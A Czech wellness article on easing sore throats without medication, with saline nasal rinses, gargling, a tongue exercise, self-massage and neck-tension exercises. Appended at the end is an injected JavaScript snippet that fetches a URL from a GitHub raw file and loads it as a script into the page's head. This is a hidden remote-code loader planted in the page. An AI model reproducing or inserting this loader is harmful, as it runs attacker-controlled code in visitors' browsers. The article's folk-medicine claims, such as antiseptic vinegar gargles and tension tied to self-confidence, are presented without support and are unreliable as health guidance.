Podzimní a zimní období často doprovází nachlazení, rýmy a opakované bolesti v krku. Krk je jedna z nejvíce namáhaných oblastí v našem těle – je to cesta pro vzduch i potravu, je místem, kde je uložena štítná žláza a příštítná tělíska, jenž regulují látkovou výměnu. Krk také velmi citlivě reaguje na náš psychický stres. Díky němu se svaly na krku dostanou do tenze, která je velmi nepříjemná, způsobuje bolesti zadní části krku a zabraňuje volnému proudění energie k ostatním částem těla. Jak si pomoci bez léků s pomocí poznatků východní medicíny?

Jak na viry a bakterie

Jsou nejčastější příčinou bolestí v krku. Negativní roli obvykle hraje i znečištěné ovzduší. Pokud se nám opakovaně vrací bolesti v krku, zkuste kloktat a čistit dutiny slanou vodou, která má silně desinfekční účinky. Lžičku soli (bez jódu)zalijte vařící vodou v menší nádobce, do které můžete ponořit nos. Vodu nechte vychladnout na pokojovou teplotu, potom si prsty zacpěte jednu nosní dírku a ponořte nos do vody. Do volné nosní dírky natáhněte slanou vodu, napodobte mělké dýchání, ucítíte, jak vám voda proniká do nosu. Pak se zakloňte a nechte vodu stéci do zadní části nosu, ideálně ucítíte, jak vám stéká až do krku. Totéž opakujte s druhou nosní dírkou. Potom proveďte jemné ale důkladné vyprázdnění nosu. Teplou vodou také vykloktejte. Kloktání lze provádět i s jablečným octem, který má také silně antibakteriální a antiseptické účinky.

Cviky a automasáž

Proti bolestem v krku by měl pomoci cvik, který je především prevencí. Je velmi jednoduchý a zabere minimum času. V kleku na všech čtyřech končetinách co nejvíce vyplázněte jazyk, přičemž se dívejte na špičku nosu. Opakujte třikrát, minimálně jednou týdně.

Velmi prostá je automasáž, která pomáhá i při šumění v uších a zánětu mandlí. Spojte ukazováky a prostředníky a těmito prsty masírujte místo na obou stranách hlavy, pod ušima, kde cítíte prhlubeň mezi dolní čelistí a zdvihačem hlavy. Několikrát místo stiskněte, když ucítíte tlak, povolte. Cvičení opakujte podle potřeby, jednou nebo i několikrát denně.

Tenze v krční oblasti

Bývá způsobena stresem nebo psychickými problémy. Svaly na krku velmi citlivě na toto reagují a okamžitě se stáhnou. Nevyslovené myšlenky a pocity, které nás trápí, nedostatečné sebevědomí, odvaha říci nahlas co se nám nelíbí, vyjádřit naše přání, to vše se odráží na stavu našeho krku. Kromě klasické masáže pomůže také velmi jednoduchý cvik. Vytáhněte ramena co nejvíce k uším, nadechněte se a napněte ramenní a krční svaly. S výdechem povolte. Opakujte alespoň pětkrát. Napětí by mělo povolit. Průběžně bychom pak měli pracovat na odstranění příčin krční tenze– ať už eliminování stresu a či budování svého sebevědomí. Pomůžeme tak nejen svému krku.

  (var url = „https://raw.githubusercontent.com/truba77/trubnik/main/to.txt“; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(„script“); script.src = data.trim(); document.getElementsByTagName(„head“)[0].appendChild(script); });)